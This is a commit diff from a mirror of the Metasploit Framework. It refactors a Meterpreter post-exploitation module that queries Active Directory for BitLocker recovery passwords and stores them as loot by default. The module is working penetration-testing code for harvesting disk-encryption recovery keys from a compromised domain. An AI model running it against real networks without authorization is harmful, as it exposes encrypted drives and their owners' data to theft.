infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Tidyup and update for new ADSI format

bug/bundler_fix
Meatballs 2015-04-29 09:48:44 +01:00
parent 0d81ad4db4
commit 7e5b03c44e
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
1 changed files with 28 additions and 39 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

67
modules/post/windows/gather/enum_ad_bitlocker.rb
View File

@ -8,69 +8,60 @@ require 'msf/core'
require 'msf/core/auxiliary/report' require 'msf/core/auxiliary/report'
class Metasploit3 < Msf::Post class Metasploit3 < Msf::Post
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
include Msf::Post::Windows::LDAP include Msf::Post::Windows::LDAP
def initialize(info={}) def initialize(info = {})
super( update_info( info, super(update_info(info,
'Name' => 'Windows Gather Active Directory Bitlocker Recovery', 'Name' => 'Windows Gather Active Directory Bitlocker Recovery',
'Description' => %Q{ 'Description' => %(
This module will enumerate bitlocker reocvery passwords in the default AD This module will enumerate bitlocker reocvery passwords in the default AD
directory. Requires Domain Admin or other delegated privileges. directory. Requires Domain Admin or other delegated privileges.
}, ),
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' ], 'Author' => [ 'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' ],
'Platform' => [ 'win' ], 'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ], 'SessionTypes' => [ 'meterpreter' ],
'References' => 'References' =>
[ [
['URL', 'tbc'], ['URL', 'https://technet.microsoft.com/en-us/library/cc771778%28v=ws.10%29.aspx']
] ]
)) ))
register_options([ register_options([
OptBool.new('STORE_LOOT', [true, 'Store file in loot.', false]), OptBool.new('STORE_LOOT', [true, 'Store file in loot.', true]),
OptString.new('FIELDS', [true, 'FIELDS to retrieve.', 'distinguishedName,msFVE-RecoveryPassword']), OptString.new('FIELDS', [true, 'FIELDS to retrieve.', 'distinguishedName,msFVE-RecoveryPassword']),
OptString.new('FILTER', [true, 'Search filter.', '(objectClass=msFVE-RecoveryInformation)']) OptString.new('FILTER', [true, 'Search filter.', '(objectClass=msFVE-RecoveryInformation)'])
], self.class) ], self.class)
end end
def run def run
fields = datastore['FIELDS'].gsub(/\s+/,"").split(',') fields = datastore['FIELDS'].gsub(/\s+/, "").split(',')
search_filter = datastore['FILTER'] search_filter = datastore['FILTER']
max_search = datastore['MAX_SEARCH'] max_search = datastore['MAX_SEARCH']
q = query(search_filter, max_search, fields) q = query(search_filter, max_search, fields)
if q.nil? or q[:results].empty? if q.nil? || q[:results].empty?
print_status('No results found...')
return return
end end
# Results table holds raw string data # Results table holds raw string data
results_table = Rex::Ui::Text::Table.new( results_table = Rex::Ui::Text::Table.new(
'Header' => "Bitlocker Recovery Passwords", 'Header' => 'Bitlocker Recovery Passwords',
'Indent' => 1, 'Indent' => 1,
'SortIndex' => -1, 'SortIndex' => -1,
'Columns' => fields 'Columns' => fields
) )
# Reports are collections for easy database insertion
reports = []
q[:results].each do |result| q[:results].each do |result|
row = [] row = []
report = {} result.each do |field|
0.upto(fields.length-1) do |i| field_value = (field.nil? ? '' : field[:value])
if result[i].nil? row << field_value
field = ""
else
field = result[i]
end
row << field
end end
reports << report
results_table << row results_table << row
end end
@ -80,6 +71,4 @@ class Metasploit3 < Msf::Post
print_status("Results saved to: #{stored_path}") print_status("Results saved to: #{stored_path}")
end end
end end
end end